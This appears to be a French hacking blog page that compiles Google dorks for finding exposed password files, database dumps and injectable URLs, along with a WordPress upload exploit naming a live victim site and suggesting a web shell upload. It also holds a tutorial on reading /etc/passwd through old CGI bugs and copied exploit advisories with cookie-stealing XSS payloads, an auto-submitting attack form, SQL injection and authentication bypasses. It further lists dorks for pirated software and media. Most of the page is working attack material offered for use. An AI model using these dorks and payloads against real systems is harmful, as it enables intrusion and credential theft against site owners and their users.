Google Dorking

• ▼  2018 (2) 

  • ▼  Février (2) 

    • ▼  8 février (2) 

      • intitle: index / & filetype: sql

      • inurl: /admin/login.asp & intext: Mot de passe

      • 
        

• ►  2017 (11) 

• 
  

• ►  2016 (33) 

• 
  

• ►  2015 (16) 

• 
  

• ►  2014 (75)

~GoOGLE  DoRK*°

***************************************************************************************

HK ~d[²_*]b¤°¨

********************************************************************************************

***********************************************************************

=============================================

****************

¤¤¤¤

/ wp-content / thèmes  (music)

cms-index-index

/wp-content/themes/wpstore/upload/

obd .exe or .zip or .rar index of/

/ wp-content / thèmes  (music)

cms-index-index

/wp-content/themes/wpstore/upload/

WordPress wp-store theme remote file upload

Google Dork: inurl:/wp-content/themes/WPstore/

Exploit: /wp-content/themes/WPStore/upload/

Example: http://www.[target].com/wp-content/themes/WPStore/upload/

Live target: http://www.wholisticnutrition.com.au/wp-content/themes/WPStore/upload/

Upload: http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/index.html

You can upload:  .html , .pdf , .jpg ,.gif 

Access to your file: /wp-content/uploads/products_img/

[+]Dork: inurl:/wp-content/themes/WPstore

[+]inurl:/wp-content/themes/eShop/upload

[+]inurl:/wp-content/themes/KidzStore/upload

[+]inurl:/wp-content/themes/Emporium/upload

[+]inurl:/wp-content/themes/Store/upload

[+]inurl:/wp-content/themes/eCommerce/upload

[+]inurl:/wp-content/themes/framework/upload

=============================================

[+]Exploit: /wp-content/themes/WPStore/upload/

Upload shell shell.php.gif or index.html

[+]Example: http://www.[target].com/wp-content/themes/WPStore/­upload/

[+]Access to your file: /wp-content/uploads/products_img

  COMMENT UTILISER LE DORK.

* Accédez à http://www.google.com

* Placez votre curseur sur le champ de recherche 

* Coller ou Entrez le code ci-dessous;

Intitle: "index de /" (zip | rar | 7z | exe) (Nom du fichier / logiciel / musique) p.ex. PhotoshopCS4

                                   ou 

Intitle: "index de /" (zip | rar | 7z | exe | mp3 | 3gp | apk | jar | sis) Wale - Clappers

(SUPPRIMEZ LE TAG MP3 SI VOUS NE RECHERCHEZ PAS DE FICHIER MP3)

WordPress wp-store theme remote file upload

Google Dork: inurl:/wp-content/themes/WPstore/

Exploit: /wp-content/themes/WPStore/upload/

Example: http://www.[target].com/wp-content/themes/WPStore/upload/

Live target: http://www.wholisticnutrition.com.au/wp-content/themes/WPStore/upload/

Upload: http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/index.html

You can upload:  .html , .pdf , .jpg ,.gif 

Access to your file: /wp-content/uploads/products_img

********************************************************************************************

Théorie et explication des failles cgi et scripts

        Le titre ne vous dira peut-être rien, d'ailleurs, j'aurais pas écris l'article je n'en aurais pas la moindre idée non plus. ;-) On va prendre un exemple pour expliquer le titre alors. Vous avez sûrement remarqué quand vous allez dans un site un "cgi-bin" au niveau de l'url. Il y en a très souvent dans les moteurs de recherche. AltaVista en est d'ailleurs un très bon exemple. Vous allez sur altavista et vous tapez hacking et choisissez la langue française, lancez la recherche. L'url de la page deviendra la suivante: "http://www.altavista.com/cgi-bin/query?pg=q&kl=fr&q=hacking&search=Search" 

    Vous l'avez vu le cgi? Bah voilà, c'est ça. En gros c'est un programme écrit en pearl ou en c (ou en d'autres langages mais ce sont les plus répondus) qui permet des accès à l'intérieur du serveur par mot clé. Certaines séries de lettres représentent des touches tapées comme "Enter" par exemple. Ce qui fait qu'en mettant une adresse on exécute un programme, qui, s'il est buggé (plutôt si nous connaissons le bug ;-), car bug il y a toujours), agira en fait comme un outil de recherche genre "explorateur Windows". Un cgi peut vraiment faire beaucoup de choses: recherche de fichiers, compteur de visites, animations, ... Et son utilisation dans les sites est très répandu vu qu'il a à peu près le même potentiel qu'un script Java. Sacré potentiel n'est ce pas? 

        Ci-dessous différentes manières d'exploiter ces bugs pour devenir root ou pour faire d'autres truc sympa juste avec Netscape. Même pas besoin de Linux, c'est pas fort ça? Juste d'un petit crack jack, enfin, je vous refais pas un cours. Sachez qu'à ma connaissance il y a au moins 130 bugs cgi trouvés d'où de quoi pas mal s'amuser. Ici je n'en donne que cinq mais d'autres s'ajouteront avec le temps. 

Pfs: 

        Des filtres pas très au point sur certaines requêtes permettent d'accéder au fichier contenant le password root sur les serveur tournant sous NCSA (version inférieure ou égale à 1.5 ) et sous apache (versions inférieures à 1.0.5): 

http://url_du_site/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Pfs (un autre bug): 

        Idem mais là, la commande change vraiment très peu et ça ne marche pas que sur ceux énumérés au dessus: 

http://url_du_site/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd

Php: 

        Même chose que ci-dessus sauf que c'est avec php. La syntaxe n'est pas la même mais le résultat est identique, on a le pass root: 

http://url_du site/cgi-bin/php.cgi?/etc/passwd

Php (un autre bug): 

        Idem mais là, la commande change vraiment très peu: 

http://url_du site/cgi-bin/php?/etc/passwd

Query:

        Là c'est encore la même chose mais ça marche avec query:

http://url_du site/cgi-bin/query?%0a/bin/cat%20/etc/passwd

Htmlscript: 

        Là aussi ça sert à devenir root en trouvant le pass root, le tout est de savoir où se trouve le répertoire /etc par rapport au cgi-bin. Si vous connaissez un peu l'arborescence des répertoires sous UNIX vous ne devriez pas avoir trop de problème à vous repérer, surtout que vous n'êtes pas obligé de mettre /etc/passwd mais par exemple: /usr/rhylkim, sous peine bien sûr que le fichier rhylkim et le répertoire /usr éxistent. 

http://url_du_site/cgi-bin/htmlscript?../../etc/passwd

        Dans cet exemple il s'agissait de redescendre à la racine là où se trouve le répertoire /etc et pour cela on est descendu de trois niveaux vu que dans cet exemple, le cgi-bin se trouvait dans le répertoire: /web/info/revelation. Mais ce n'est qu'un exemple. Le cgi-bin pourrait très bien se trouver dans le répertoire: /bin/rhylkim et on aurait été obligé de faire:

http://www.assassin.com/cgi-bin/htmlscript?../../etc/passwd. 

        Si vous voulez comprendre la structure de ces exploits, je vais vous les expliquer un peu. le %0a correspond à un "enter" en pearl et le %20 a un "espace" en pearl. Les cat est un éditeur sous unix et les fait de faire "cat%20/etc/passwd" aura l'effet de faire "cat passwd" dans le répertoire /etc ce qui aura pour effet de vous dévoiler l'interieur du fichier comme vous pourriez le faire avec word. 

        Dans quel cas les cgi phf et autres scripts ne servent à rien? Si le serveur a ses pages web transitant par le port 8000, 8001 ou 8080 ca ne sert à rien d'essayer car même si les bug des cgi sont présents, vous ne pourrez pas accéder au répertoire contenant le fichier passwd. En effet le http passe le plus couramment par le port 80 mais le port 8080 est aussi très souvent utilisé notamment pour ce qui concerne les proxy. Les ports 8000 et 8001 sont assez peu utilisé mais que cela ne vous étonne pas si vous tembez dessus. Vous pouvez récupérer le passwd avec les cgi si le http passe par le port 80 car c'est un port privilégié et les 8080, 8000 et 8001 ne le sont pas. Un port privilégié signifie que seul le root ou une personne loguée en tant que root (su) peut l'utiliser ou utiliser des programmes faisant transiter des paquets par celui ci. Pour savoir si un serveur a son http sur le port 80 ou autres c'est assez simple, mettez ":n°_du_port" après son DNS. 

Exemple:

        Si le serveur a son http à l'adresse http://www.site.com/, faites http://www.site.com:80/ et si la page reste la même il est sur le port 80. Bien sur si vous obtenez une page vide avec des mots comme "not found" genre ce que l'on trouve en faisant http://www.fbi.gov:8080/ ou une page non attribuée (faites le même serveur mais avec le port 8000) c'est que le http ne se trouve pas sur le port que vous avez demandé. 

        Bien sûr je n'ai pas tout à fait raison quand je vous dis que les scripts cgi ne servent à rien si le http n'est pas lancé en root. Cela pourra toujours vous donner un accès user sur la bécane si le bug est présent. Et on ne devient pas toujours root tout de suite (et même loin de là) et l'accès user est toujours plus important qu'un accès en anonymous surtout que si l'account de cet user a servi au http il a peut être servi à autre chose. Mais il se peut aussi que cet account soit stérile car l'admin a très bien pu utiliser un port différent du 80 par mesure de sécutité et donc a prévu le fait que l'account sous lequel il a lancé le http soit hacké par la suite. 

        Voilà, c'est tout, j'en ai encore une petite dizaine mais ce sera pour un autre jour car ce sont essentiellement des scripts. Pour tous les exemples précédents, il s'agissait de serveurs n'ayant pas de pass shadows. Si vous voulez exploiter ces bugs avec une machine ayant des pass shadows (la plupart d'ailleurs) il faudra pour cela remplacer /etc/passwd par le répertoire et le fichier pass correspondant suivant le type de serveur attaqué

********************************************************************************************

 google-dorks

=============================================

Explications

cache: Si vous incluez d'autres mots dans la requête, Google les mettra en évidence

  le document mis en cache. Par exemple, [cache: www.google.com web] affichera le cache

 contenu avec le mot "web" mis en évidence. Cette fonctionnalité est également accessible par

 en cliquant sur le lien "En cache" sur la page de résultats principale de Google. La requête [cache:] sera

 afficher la version de la page Web que Google a dans son cache. Par exemple,

 [cache: www.google.com] affichera le cache de Google sur la page d'accueil Google. Notez là

 peut être aucun espace entre le "cache:" et l'URL de la page Web.

=============================================

link: La requête [link:] listera les pages Web qui ont des liens vers la page Web spécifiée.

 Par exemple, [link: www.google.com] répertoriera les pages Web dont les liens pointent vers

 Page d'accueil Google Notez qu'il ne peut y avoir aucun espace entre le "lien" et l'URL de la page Web.

=============================================

related: La requête [related:] va lister les pages web qui sont "similaires" à un web spécifié

 page. Par exemple, [related: www.google.com] répertorie les pages Web similaires à

 la page d'accueil Google Notez qu'il ne peut y avoir aucun espace entre le "related:" et le web

 L'URL de la page.

=============================================

info: La requête [info:] présentera des informations que Google a sur ce site

 page. Par exemple, [info: www.google.com] affichera des informations sur Google

 page d'accueil Notez qu'il ne peut pas y avoir d'espace entre "info:" et l'URL de la page Web.

=============================================

define: La requête [define:] va fournir une définition des mots que vous entrez après,

 recueillies à partir de diverses sources en ligne. La définition sera pour toute la phrase

 entré (c'est-à-dire qu'il inclura tous les mots dans l'ordre exact où vous les avez tapés).

=============================================

stocks: Si vous lancez une requête avec l'opérateur [stocks:], Google traitera le reste

 des termes de la requête en tant que symboles boursiers, et un lien vers une page affichant le stock

 informations pour ces symboles. Par exemple, [stocks: intc yhoo] affichera des informations

 à propos d'Intel et Yahoo. (Notez que vous devez taper les symboles du téléscripteur, pas le nom de l'entreprise.)

=============================================

site: Si vous incluez [site:] dans votre requête, Google limitera les résultats à ceux

 sites Web dans le domaine donné. Par exemple, [site d'aide: www.google.com] trouvera les pages

 à propos de l'aide sur www.google.com [help site: com] trouvera des pages sur l'aide au sein de

 .com urls. Notez qu'il ne peut y avoir aucun espace entre le "site:" et le domaine.

=============================================

allintitle: Si vous lancez une requête avec [allintitle:], Google limitera les résultats

 à ceux avec tous les mots de requête dans le titre. Par exemple,

 [allintitle: google search] ne retournera que les documents qui ont à la fois "google"

 et "recherche" dans le titre.

=============================================

intitle: Si vous incluez [intitle:] dans votre requête, Google limitera les résultats

 aux documents contenant ce mot dans le titre. Par exemple, [intitle: google search]

 retournera les documents mentionnant le mot "google" dans leur titre, et mentionnera

 mot "recherche" n'importe où dans le document (titre ou non). Notez qu'il ne peut y avoir d'espace

 entre le "intitle:" et le mot suivant. Mettre [intitle:] devant tous les

 mot dans votre requête équivaut à mettre [allintitle:] à l'avant de votre

 query: [intitle: google intitle: search] est identique à [allintitle: google search].

=============================================

allinurl: Si vous lancez une requête avec [allinurl:], Google limitera les résultats à

 ceux avec tous les mots de requête dans l'URL. Par exemple, [allinurl: google search]

 retournera uniquement les documents qui ont à la fois "google" et "search" dans l'url. Remarque

 que [allinurl:] fonctionne sur les mots, pas sur les composants url. En particulier, il ignore

 ponctuation. Ainsi, [allinurl: foo / bar] limitera les résultats à la page avec le

 les mots "foo" et "bar" dans l'URL, mais n'exige pas qu'ils soient séparés par un

 slash dans cette URL, qu'ils soient adjacents, ou qu'ils soient dans ce particulier

 ordre des mots. Il n'y a actuellement aucun moyen de faire respecter ces contraintes.

=============================================

inurl: Si vous incluez [inurl:] dans votre requête, Google limitera les résultats à

 documents contenant ce mot dans l'url. Par exemple, [inurl: google search]

 retourner les documents qui mentionnent le mot "google" dans leur URL, et mentionner le mot

 "Rechercher" n'importe où dans le document (url ou non). Notez qu'il ne peut y avoir aucun espace entre

 le "inurl:" et le mot suivant. Mettre "inurl:" devant chaque mot de votre

 requête équivaut à mettre "allinurl:" au début de votre requête:

 [inurl: google inurl: search] est le même que [allinurl: google search].

=============================================

Nina Simone Titre: "index.of" "répertoire parent" "taille" "dernière modification" "description" Je mets un sort sur toi (mp4 | mp3 | avi | flac | aac | ape | ogg) -inurl: (jsp | php | html | aspx | htm | cf | shtml | paroles-domaine | mp3-collection) -site: .info

Bill Gates intitule: "index.of" "répertoire parent" "taille" "dernière modification" "description" Microsoft (pdf | txt | epub | doc | docx) -inurl: (jsp | php | html | aspx | htm | cf | shtml | ebooks | ebook) -site: .info

répertoire parent / appz / -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

répertoire parent DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

répertoire parent Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

répertoire parent Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

répertoire parent MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

répertoire parent Nom du chanteur ou album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

filetype: config inurl: web.config inurl: ftp

"Windows XP Professionnel" 94FBR

ext: (doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext: salaire confidentiel | intext: "budget approuvé") inurl: confidentiel

ext: (doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext: salaire confidentiel | intext: "budget approuvé") inurl: confidentiel

ext: inc "pwd =" "UID ="

ext: ini intext: env.ini

ext: ini Version = ... mot de passe

ext: ini Version = 4.0.0.4 mot de passe

ext: ini eudora.ini

ext: ini intext: env.ini

ext: log "Logiciel: Microsoft Internet Information Services *. *"

ext: log "Logiciel: Microsoft Internet Information

ext: log "Logiciel: Microsoft Internet Information Services *. *"

ext: log \ "Logiciel: Microsoft Internet Information Services *. * \"

ext: mdb inurl: *. mdb inurl: fpdb shop.mdb

ext: mdb inurl: *. mdb inurl: fpdb shop.mdb

ext: mdb inurl: *. mdb inurl: fpdb shop.mdb

filetype: SWF SWF

filetype: TXT TXT

filetype: XLS XLS

filetype: asp DBQ = "* Server.MapPath (" *. mdb ")

filetype: asp "Message d'erreur personnalisé" Catégorie Source

filetype: asp + "[ODBC SQL"

filetype: asp DBQ = "* Server.MapPath (" *. mdb ")

filetype: asp DBQ = \ "* Server.MapPath (\" *. mdb \ ") 

filetype: asp "Message d'erreur personnalisé" Catégorie Source

filetype: bak createobject sa

filetype: bak inurl: "htaccess | mot de passe | shadow | htusers"

filetype: bak inurl: \ "htaccess | mot de passe | shadow | htusers \" 

filetype: conf inurl: pare-feu -intitle: cvs 

filetype: conf inurl: proftpd. Le fichier de configuration du serveur FTP PROFTP révèle

filetype: dat "password.dat

filetype: dat \ "password.dat \" 

filetype: eml eml + intext: "Sujet" + intext: "De" + intext: "A"

filetype: eml eml + intext: \ "Sujet \" + intext: \ "De \" + intext: \ "To \" 

filetype: eml eml + intext: "Sujet" + intext: "De" + intext: "A"

filetype: inc dbconn 

filetype: inc intext: mysql_connect

filetype: mysql_connect OU mysql_pconnect 

filetype: log inurl: "password.log"

filetype: nom d'utilisateur du journal putty Les journaux du client SSH PUTTY peuvent révéler des noms d'utilisateur

filetype: log "Erreur d'analyse PHP" | "Avertissement PHP" | "Erreur PHP"

filetype: mdb inurl: users.mdb

filetype: ora ora

filetype: ora tnsnames

filetype: passe pass intext: utilisateur

filetype: pdf "Rapport d'évaluation" nessus

filetype: pem intext: privé

filetype: propriétés inurl: db intext: mot de passe

filetype: pst inurl: "outlook.pst"

filetype: pst pst -de -à -date

filetype: reg reg + intext: "nom d'utilisateur par défaut" + intext: "defaultpassword"

filetype: reg reg + intext: \ "nomdusername \" + intext: \ "defaultpassword \" 

filetype: reg reg + intext: â? WINVNC3â?

filetype: reg reg + intext: "nom d'utilisateur par défaut" + intext: "defaultpassword"

filetype: reg reg HKEY_ Les exportations du registre Windows peuvent révéler

filetype: reg reg HKEY_CURRENT_USER SSHHOSTKEYS

filetype: sql "insert into" (passe | mot de passe | mot de passe)

filetype: sql ("valeurs * MD5" | "valeurs * mot de passe" | "valeurs * encrypt")

filetype: sql (\ "valeurs passwd \" | \ "valeurs de mot de passe \" | \ "valeurs de passe \") 

filetype: sql (\ "valeurs * MD \" | \ "valeurs * mot de passe \" | \ "valeurs * encrypt \") 

filetype: sql + "IDENTIFIÉ PAR" -cvs

filetype: mot de passe sql

filetype: mot de passe sql 

filetype: sql "insert into" (passe | mot de passe | mot de passe)

filetype: url + inurl: "ftp: //" + inurl: "; @"

filetype: url + inurl: \ "ftp: // \" + inurl: \ "; @ \" 

filetype: url + inurl: "ftp: //" + inurl: "; @"

filetype: xls inurl: "email.xls"

filetype: xls nom d'utilisateur mot de passe email

index de: intext: Galerie en mode Configuration

index.of liste de diffusion

index.of perform.ini mIRC IRC fichier ini peut énumérer les noms d'utilisateur IRC et

index.of.dcim 

index.of.password 

intext: "-FrontPage-" ext: pwd inurl: (service | auteurs | administrateurs | utilisateurs)

intext: "" BiTBOARD v2.0 "Tableau d'affichage de BiTSHiFTERS"

intext: "# -FrontPage-" ext: pwd inurl: (service | auteurs | administrateurs | utilisateurs) "# -FrontPage-" inurl: service.pwd

intext: "# mysql dump" filetype: sql

intext: "# mysql dump" type de fichier: sql 21232f297a57a5a743894a0e4a801fc3

intext: "Une erreur de syntaxe s'est produite" filetype: ihtml

intext: "ASP.NET_SessionId" "source de données ="

intext: "A propos du partage Web personnel Mac OS"

intext: "Un caractère illégal a été trouvé dans l'instruction" - "message précédent"

intext: "AutoCreate = TRUE mot de passe = *"

intext: "Impossible de se connecter au local" intitle: warning

intext: "Déclaration de pratique de certificat" filetype: PDF | DOC

intext: "Certificate Practice Statement" inurl: (PDF | DOC)

intext: "Droit d'auteur (c) Tektronix, Inc." "état de l'imprimante"

intext: "Copyright © Tektronix, Inc." "état de l'imprimante"

intext: "Les applications web Emergisoft font partie de notre"

intext: "Erreur Diagnostic Information" intitle: "Erreur survenue"

intext: "Message d'erreur: Erreur lors du chargement des bibliothèques requises."

intext: "Etablissement d'une session Integrated Lights Out sécurisée avec" OU intitle: "Data Frame - Navigateur non compatible HTTP 1.1" OU intitle: "HP Integrated Lights-

intext: "Erreur fatale: Appel à une fonction indéfinie" -réponse -le -puis

intext: "Remplissez complètement le formulaire ci-dessous pour changer votre mot de passe et votre nom d'utilisateur.Si un nouveau nom d'utilisateur est laissé vide, votre ancien sera supposé." -edu

intext: "Généré par phpSystem"

intext: "Généré par phpSystem"

intext: "Rapport de vulnérabilité de l'hôte"

intext: "HostingAccelerator" intitle: "login" + "Nom d'utilisateur" - "news" -demo

intext: "Messagerie Web du serveur IMail" intitle: login

intext: "Syntaxe incorrecte proche"

intext: "Index de" / "chat / logs"

intext: "Index de / réseau" "dernière modification"

intext: "Index de /" + .htaccess

intext: "Index de /" + mot de passe

intext: "Index de /" + mot de passe.txt

intext: "Index de / admin"

intext: "Index de / sauvegarde"

intext: "Index de / mail"

intext: "Index de / mot de passe"

intext: "Microsoft (R) version Windows * (TM) * DrWtsn32 Copyright (C)" ext: log

intext: "Microsoft CRM: version du navigateur non prise en charge"

intext: "Version de Microsoft® Windows * ™ * DrWtsn32 Copyright ©" ext: log

intext: "Rapport d'évaluation de l'hôte du réseau" "Internet Scanner"

intext: "Rapport d'évaluation de la vulnérabilité du réseau"

intext: "Rapport d'évaluation de la vulnérabilité du réseau"

intext: "Rapport d'évaluation de la vulnérabilité du réseau" ?? ?? pc007.com

intext: "Pilote SQL Server] [SQL Server] Ligne 1: syntaxe incorrecte à proximité"

intext: "Merci pour votre commande" + reçu

intext: "Merci pour votre commande" + reçu

intext: "Merci pour votre achat" + téléchargement

intext: "Le rapport suivant contient des informations confidentielles" vulnérabilité -search

intext: "phpMyAdmin MySQL-Dump" "INSERT INTO" - "le"

intext: "phpMyAdmin MySQL-Dump" filetype: txt

intext: "phpMyAdmin" "fonctionnant sur" inurl: "main.php"

mot de passe intext | mot de passe) intextusername | userid | utilisateur) filetype: csv

mot de passe intext | mot de passe) intextusername | userid | utilisateur) filetype: csv

intitle: "index de" + taille de myd

intitle: "index de" etc / ombre

intitle: "index de" htpasswd

intitle: "index de" intext: connect.inc

intitle: "index de" intext: globals.inc

intitle: "index of" master.passwd

intitle: "index de" master.passwd 007 ?? ??

intitle: "index of" membres OU comptes

intitle: "index de" mysql.conf OU mysql_config

intitle: "index de" passwd

intitle: "index de" people.lst

intitle: "index de" pwd.db

intitle: "index de" spwd

intitle: "index of" user_carts OU user_cart

intitle: "index.of *" admin news.asp configview.asp

intitle :( "TrackerCam Live Video") | ("TrackerCam Application Connexion") | ("Trackercam Remote") -trackercam.com

intitle :( "TrackerCam Live Video") | ("TrackerCam Application Connexion") | ("Trackercam Remote") -trackercam.com

inurl: admin inurl: liste d'utilisateurs Fichiers de listes d'utilisateurs génériques

=============================================

Utiliser une chaîne de recherche spéciale pour trouver des sites Web vulnérables:

inurl: php? = id1

inurl: index.php? id =

inurl: trainers.php? id =

inurl: buy.php? category =

inurl: article.php? ID =

inurl: play_old.php? id =

inurl: declaration_more.php? decl_id =

inurl: pageid =

inurl: games.php? id =

inurl: page.php? file =

inurl: newsDetail.php? id =

inurl: gallery.php? id =

inurl: article.php? id =

inurl: show.php? id =

inurl: staff_id =

inurl: newsitem.php? num = andinurl: index.php? id =

inurl: trainers.php? id =

inurl: buy.php? category =

inurl: article.php? ID =

inurl: play_old.php? id =

inurl: declaration_more.php? decl_id =

inurl: pageid =

inurl: games.php? id =

inurl: page.php? file =

inurl: newsDetail.php? id =

inurl: gallery.php? id =

inurl: article.php? id =

inurl: show.php? id =

inurl: staff_id =

inurl: newsitem.php? num =

********************************************************************************************

EXPLOIT  GoOGLE*°

# Exploit Title: WooCommerce Store Exporter v1.7.5 Stored XSS

# Google Dork: inurl:"woocommerce-exporter"

# Date: 26/08/2014

# Exploit Author: Mike Manzotti @ Dionach

# Vendor Homepage: http://www.visser.com.au/plugins/store-exporter/

# Software Link: http://downloads.wordpress.org/plugin/woocommerce-exporter.zip  (Fixed)

# Version: v1.7.5

# Vulnerability Disclosure Timeline:

2014-08-25:  Discovered vulnerability

2014-08-25:  Vendor Notification

2014-08-25:  Vendor Response/Feedback

2014-08-26:  Vendor Fix/Patch (v 1.7.6)

2014-08-26:  Public Disclosure

Stored Cross Site Scripting

URL

FIELDS

/wp-admin/admin.php?page=woo_ce&tab=export

POST: export_filename

POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings

export_filename="</script><script>alert(document.cookie)</script>&delete_file=0&encoding=UTF-8&timeout=0&delimiter=%2C&category_separator=%7C&bom=1&escape_formatting=all&enable_auto=0&auto_type=products&order_filter_status=&auto_method=archive&enable_cron=0&submit=Save+Changes&action=save-settings

Response:

<input name="export_filename" type="text" id="export_filename" value="\"</script><script>alert(document.cookie)</script>"

[cid:image005.jpg@01CFC090.5AED79D0]

Scenario:

An attacker creates a malicious page as shown below and uploads it on a server under attacker's control.

<html>

<head>

<title>XSS WooCommerce - Store Exporter</title>

</head>

<body onload="javascript:document.forms[0].submit()">

<form method="POST" name="1" action="http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings">

<input type="hidden" name="export_filename" value='"</script><script>alert(document.cookie)</script>"'/>

<input type="hidden" name="action" value="save-settings"/>

</form>

</body>

</html>

When a WordPress administrator visits the malicious page above, a JavaScript code which prompts administrator's cookies will be saved on the victim's website. The attacker could send the URL pointing to the malicious webpage in an email or posting it in a review of a WooCommerce product, as shown below:

[cid:image012.jpg@01CFC090.5AED79D0]

When the WordPress administrator clicks on the malicious URL...

[cid:image013.jpg@01CFC090.5AED79D0]

The JavaScript code will be executed and saved in Store Exporter Settings:

http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings

[cid:image014.jpg@01CFC090.5AED79D0]

Reflected Cross Site Scripting

URL

FIELDS

/wp-admin/admin.php?page=woo_ce&tab=export

GET: tab, POST: dataset

1) Example

Request:

http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(1)</script<http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(1)%3c/script>>

Response:

[...]

<code>tabs-export<script>alert(1)</script>c172f.php</code>

[...]

http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=<script>alert(document.cookie)</script<http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=%3cscript%3ealert(document.cookie)%3c/script>>

[cid:image015.jpg@01CFC090.5AED79D0]

http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=settings

2) Example

Request:

POST http://192.168.71.133/wp/wp-admin/admin.php?page=woo_ce&tab=export

dataset=users1be3c<script>alert(1)<%2fscript>87acc&product_fields_order%5Bparent_id%5D=&product_fields_order%5Bparent_sku%5D=&product_fields_order%5Bproduct_id%5D=&product_fields_order%5Bsku%5D=&product_field

Response:

[...]

<h3>Export Details: export_users1be3c<script>alert(1)</script>

[...]

=============================================

# Exploit Title: WordPress woocommerce  directory traversal

# Date: 28-11-2017

# Software Link: https://wordpress.org/plugins/woocommerce/

# Exploit Author:fu2x2000

# Contact: fu2x2000@gmail.com

# Website:

# CVE:2017-17058

#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0

# Category: webapps

1. Description

Identifying woo commerce theme pluging properly sanitized against Directory

Traversal,even the latest version of WordPress with woocommerce can be

vulnerable.

2. Proof of Concept

$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `

function file_get_contents_utf8($fn) {

    $opts = array(

        'http' => array(

            'method'=>"GET",

            'header'=>"Content-Type: text/html; charset=utf-8"

        )

    );

    $wp = stream_context_create($opts);

    $result = @file_get_contents($fn,false,$wp);

    return $result;

}

/* $head= header("Content-Type: text/html; charset=utf-8"); ; */

header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;

=============================================

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass

# Google Dork: inurl:/plugins/userpro

# Date: 11.04.2017

# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)

# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

# Version: <= 4.6.17

# Tested on: Wordpress 4.8.3

# CVE : requested, not assigned yet.

Description

================================================================================

 The userpro plugin has the ability to bypass login authentication for the user

 'admin'. If the site does not use the standard username 'admin' it is not affected.

PoC

================================================================================

1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in

will full administrator access.

================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.

10/26/2017 – Vendor resolved the issue in the plugin.

11/04/2017 - Disclosure.

****************************************************************************

 # # # # 

# Exploit Title: tPanel 2009 - Authentication Bypass 

# Dork: N/A

# Date: 30.10.2017

# Vendor Homepage: http://www.datacomponents.net/

# Software Link: http://www.datacomponents.net/products/hosting/tpanel/

# Demo: http://demo.datacomponents.net/tpanel/

# Version: 2009

# Category: Webapps

# Tested on: WiN7_x64/KaLiLinuX_x64

# CVE: CVE-2017-15974

# # # # #

# Exploit Author: Ihsan Sencan

# Author Web: http://ihsan.net

# Author Social: @ihsansencan

# # # # #

# Description:

# The vulnerability allows an attacker to inject sql commands....

# 

# Proof of Concept: 

# 

# 

# http://localhost/[PATH]/login.php

# 

# User: 'or 1=1 or ''=' Pass: anything

# 

# Etc..

# # # # #

=============================================

# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore Experience Platform 8.1 Update-3

# Date: March 15, 2017

# Exploit Author: Pralhad Chaskar

# Vendor Homepage: http://www.sitecore.net/en

# Version: 8.1 rev. 160519

# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519

# CVE : CVE-2016-8855

Vendor Description

------------------

Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.

Description

------------

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Vulnerability Class

--------------------

Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Proof of Concept

----------------

Name and Description input fields aren't properly escaped. This could lead to an XSS attack that could possibly affect administrators,users,editor.

1. Login to application and navigate to "https://abc.com/sitecore/client/Applications/List Manager/Taskpages/Contact list"

2. Create new Contact List, add the XSS vector in Name and Description parameter using proxy (Burp) and Save the Contact List

3. Navigate Dashboard of List Manager on "https://abc.com/sitecore/shell/sitecore/client/Applications/List Manager/Dashboard" leading to execution of XSS payload.

Vendor Contact Timeline

------------------------

Discovered: October 16, 2016

Vendor Notification: October 18, 2016

Advisory Publication: Mar 15, 2017

Public Disclosure: Mar 15, 2017

Affected Targets

----------------

Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519

Solution

--------

Upgrade to Sitecore Experience Platform 8.2 Update-2 to fix this issue.

Credits

-------

Pralhad Chaskar

Information Security Analyst

Help AG Middle East

References

----------

[1] Help AG Middle East http://www.helpag.com/

[2] Sitecore Experience Platform https://dev.sitecore.net/Downloads/Sitecore_Experience_Platform.aspx

=============================================

# # # # # 

# Exploit Title: Domain Marketplace Script - SQL Injection

# Google Dork: N/A

# Date: 11.03.2017

